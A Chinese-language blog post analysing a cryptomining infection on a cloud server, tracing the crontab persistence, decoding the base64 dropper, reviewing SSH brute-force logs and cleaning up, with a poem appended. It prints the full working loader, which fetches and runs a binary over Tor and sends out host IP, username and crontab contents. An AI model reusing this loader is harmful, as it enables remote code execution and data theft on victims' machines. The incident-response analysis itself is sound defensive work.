一 背景

早上就收到朋友的短信,提示阿里云机器有恶意病毒执行,一般病毒木马执行喜欢用 crontab,所以先看看 crontab 的内容:

for u in `cat /etc/passwd | cut -d":" -f1`;do crontab -l -u $u;done

结果发现可疑 crontab 脚本:

43  * * * * /root/.systemd-service.sh > /dev/null 2>&1 &

二 恶意脚本分析

查看脚本内容:

#!/bin/bash
exec &>/dev/null
echo nP8byPUGOwKjVfPZZsp5octdXHTWGyPqgVeY82zV1de6AY0ydAtgEGmo+JaumEfV
echo blA4YnlQVUdPd0tqVmZQWlpzcDVvY3RkWEhUV0d5UHFnVmVZODJ6VjFkZTZBWTB5ZEF0Z0VHbW8rSmF1bUVmVgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJ3dnp5djJucHRqdXhjcW9pYmVrbHhlc2U0Nmo0dW9uemFhcHd5bDZ3dmhka25qbHFsY29ldTdpZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQgb25pb24uZm91bmRhdGlvbiBvbmlvbi5jb20uZGUgb25pb24uc2ggdG9yMndlYi5zdSAKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash

第一句没啥好说的,就是 exec 执行的输出和错误输出重定向到黑洞文件,即不输出出错和输出信息.

1 exec &>/dev/null

第二句很奇怪就打印些 base64 内容,转后是乱码,没看到什么东西:

echo nP8byPUGOwKjVfPZZsp5octdXHTWGyPqgVeY82zV1de6AY0ydAtgEGmo+JaumEfV

重点是第三句:

echo  一串base64| base64 -d|bash

即将这一串 base64 编码的字符串用 base64 解码,然后通过管道通过 bash 执行.
解码下:

  1 nP8byPUGOwKjVfPZZsp5octdXHTWGyPqgVeY82zV1de6AY0ydAtgEGmo+JaumEfV
  2 exec &>/dev/null
  3 export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
  4
  5 d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
  6 c=$(echo "curl -4fsSLkA- -m200")
  7 t=$(echo "wvzyv2nptjuxcqoibeklxese46j4uonzaapwyl6wvhdknjlqlcoeu7id")
  8
  9 sockz() {
 10 n=(doh.defaultroutes.de dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.fla    tuslifir.is doh.li dns.digitale-gesellschaft.ch)
 11 p=$(echo "dns-query?name=relay.tor2socks.in")
 12 s=$($c https://${n[$((RANDOM%10))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
 13 }
 14
 15 fexe() {
 16 for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
 17 }
 18
 19 u() {
 20 sockz
 21 f=/int.$(uname -m)
 22 x=./$(date|md5sum|cut -f1 -d-)
 23 r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
 24 $c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
 25 chmod +x $x;$x;rm -f $x
 26 }
 27
 28 for h in tor2web.in tor2web.it onion.foundation onion.com.de onion.sh tor2web.su
 29 do
 30 if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
 31 fexe;u $t.$h
 32 ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
 33 ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
 34 else
 35 break
 36 fi
 37 done

• 第一句话仍然是一串疑似 base64 编码,解码也没看到什么特殊地方,我怀疑只是屏蔽些检测软件用的.
• 第二和三句,屏蔽输出和设置环境变量没啥特殊地方.
• 第四句:

d= echo  $(grep x:$(id -u): /etc/passwd|cut -d: -f6)

即从/etc/passwd 中获取当前用户的家目录, cut -d: -f6: cut 是切分,-d 指定切分分隔符为冒号，$(id -u)获取当前用户的 id,root 一般为 0。

• 第五句为获取执行命令:curl -4fsSLkA- -m200
  参数说明：

-4 即使用 ipv4   
-f 连接失败时不显示 http 错误 
-s 静默模式。不输出任何东西 
-S/--show-error 显示错误 
-L 参数会让 HTTP 请求跟随服务器的重定 
-k 参数指定跳过 SSL 检测。 
-A 参数指定客户端的用户代理标头，即 User-Agent 
-m200 设置最大传输时间 200s 

• 第 7 行为 echo 输出一串字符串,也许后面用到.
• 第 9 到 13 行为 sockz 函数,随机从域名查询的网站中选择一个进行域名查询:

curl -4fsSLkA- -m200  https://dns.hostux.net/dns-query?name=relay.tor2socks.in

grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"即搜索 ip,tr ' ' '\n' 空格转换行。

grep -Ev [.]0即过滤掉不包含点号的行，然后进行排序：-ur 降序排序，u 保障唯一。

head -n 1只取第一个，这种做 cc 控制的域名的 ip 是不停转换的，通过这种方式保障获取到的 ip 是最新的。

• 第 15 到 17 行，测试下，通过一个循环再这些目录下生成一个 i 文件，内容只有 exit，增加执行权限，运行一次后删除，执行一次成功就跳出循环。

-第 19 到 26 行，即 u 函数，cut -f1 -d- 以-为分隔符，取第一个字段。$(date|md5sum|cut -f1 -d-)即用当前时间生成 md5 码。

脚本：$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)
含义：查下阿里云的外网 IP，然后拼上一堆东西构成一个字符串。

脚本：$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r

含义：$c -x socks5h://$s:9050 采用 sock5 代理，代理 ip 是上面获取的 ip，socks5h:// 表示如果代理是域名通过 sock5 代理服务器解析, $t.onion$f按照我的理解应该是一些鉴权参数信息。

-e$r即设置 HTTP 的 refer 内容。
-o$x保存返回内容到文件中。
|| $c $1$f -o$x -e$r 即如果前面没有执行成功，通过这种方式获取内容保存到本地文件中。
chmod +x $x;$x;rm -f $x 执行可执行文件，然后删除。

• 第 30 行到 39 行 是整个脚本的入口，执行一个 for 循环，判断木马文件是否存在，如果不存在，则调用fexe;测试执行情况，然后调用u $t.$h 进行木马文件的下载，具体过程见上面的 u 函数的分析，再继续查看进程状态，如果不存在，继续下载执行，连续运行二次。

[root@iZbp10p2g1civrw4ggigvfZ mscms]# ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status
/proc/3879/status
[root@iZbp10p2g1civrw4ggigvfZ mscms]# ps -ef|grep 3879
root      3879     1  0 Feb19 ?        00:00:00 KuZJxv6t
root     18762  3907  0 11:01 pts/0    00:00:00 grep --color=auto 3879
[root@iZbp10p2g1civrw4ggigvfZ mscms]# lsof -p 3879
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF   NODE NAME
KuZJxv6t 3879 root  cwd    DIR  253,1     4096 917505 /root
KuZJxv6t 3879 root  rtd    DIR  253,1     4096      2 /
KuZJxv6t 3879 root  txt    REG  253,1    32168 950589 /root/5004b390813bc5e00c2a11daedad32cf (deleted)
KuZJxv6t 3879 root    0w   REG  253,1        6 131086 /tmp/.X11-unix/01

果然这个恶意的代码已经再执行了，具体干的啥那？通过 lsof 判断，没有发现有外连或打开端口的现象。

三 溯源

3.1 aureport

 aureport --auth
23115. 02/16/2021 21:17:32 ? 87.246.7.242 dovecot /usr/libexec/dovecot/auth no 1550853
23116. 02/16/2021 21:17:56 ? 87.246.7.242 dovecot /usr/libexec/dovecot/auth no 1550854
23117. 02/16/2021 21:18:02 ? 87.246.7.226 dovecot /usr/libexec/dovecot/auth no 1550862
....

通过查看认证报告，大量主机连接本主机开源 smtp 和 pop3 服务上，这个服务用的不多，直接干掉。

aureport -i --login |grep yes

排查登录信息：

可疑登录信息

从 47.110.55.79 这个阿里主机登录进来的，时间为：6 点 57分。

3.2 查看 secure 日志

[root@iZbp10p2g1civrw4ggigvfZ .X11-unix]# cat /var/log/secure|awk '/Failed/{print $(NF-3)}'|sort|uniq -c|awk '{print $2"="$1;}'
121.5.54.240=3
132.232.144.76=1
47.110.55.79=287

确实发现 47.110.55.79 失败了 287 次，看起来很像暴力破解，将其加入到黑名单中：

#! /bin/bash
cat /var/log/secure|awk '/Failed/{print $(NF-3)}'|sort|uniq -c|awk '{print $2"="$1;}' > /usr/local/bin/black.txt
for i in `cat  /usr/local/bin/black.txt`
do
  IP=`echo $i |awk -F= '{print $1}'`
  NUM=`echo $i|awk -F= '{print $2}'`
   if [ $NUM -gt 20 ];then
      grep $IP /etc/hosts.deny > /dev/null
    if [ $? -gt 0 ];then
      echo "sshd:$IP:deny" >> /etc/hosts.deny
    fi
  fi
done

3.3 清理

3.3.1 检查 hosts 和 ssh 信息

1. /etc/hosts 确实有些乱七八糟的主机，清理掉。
2. /root/.ssh/authorized_keys 也没有密钥

3. cd /etc/cron.d 发现可疑文件：

   
   
   可疑文件
   
   

   内容如下：

cat 0systemd-service
18 * * * * root /opt/systemd-service.sh > /dev/null 2>&1 &

脚本内容和上面 crontab 里面的一样，直接删除，且删除/opt/systemd-service.sh 文件。
通过 crontab 定位到/root 下面还有一个/root/.systemd-service.sh 恶意脚本也删除掉，内容都是一样的。

4. 根据脚本找到启动的进程杀掉：

[root@iZbp10p2g1civrw4ggigvfZ .X11-unix]# cat 01
3879

[root@iZbp10p2g1civrw4ggigvfZ .X11-unix]# ps -ef|grep 3879
root      3879     1  0 Feb19 ?        00:00:00 KuZJxv6t
root     29242  3907  0 12:18 pts/0    00:00:00 grep --color=auto 3879
[root@iZbp10p2g1civrw4ggigvfZ .X11-unix]# lsof -p 3879
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF   NODE NAME
KuZJxv6t 3879 root  cwd    DIR  253,1     4096 917505 /root
KuZJxv6t 3879 root  rtd    DIR  253,1     4096      2 /
KuZJxv6t 3879 root  txt    REG  253,1    32168 950589 /root/5004b390813bc5e00c2a11daedad32cf (deleted)
KuZJxv6t 3879 root    0w   REG  253,1        6 131086 /tmp/.X11-unix/01
[root@iZbp10p2g1civrw4ggigvfZ .X11-unix]# kill -9 3879

5. 后续持续一段时间观察 crontab 日志

grep "systemd-service.sh" /var/log/cron

四 后续安全措施

通过溯源分析来看，应该是通过 ssh 爆破的方式进入的，为安全起见，还是更改下 sshd 默认端口吧，本来想偷懒的，却经常被中挖矿木马。

五 诗词欣赏

清平乐·村居
   朝代：[宋代] 作者：[辛弃疾]

茅檐低小，溪上青青草。醉里吴音相媚好，白发谁家翁媪。
大儿锄豆溪东，中儿正织鸡笼。最喜小儿亡赖，溪头卧剥莲蓬。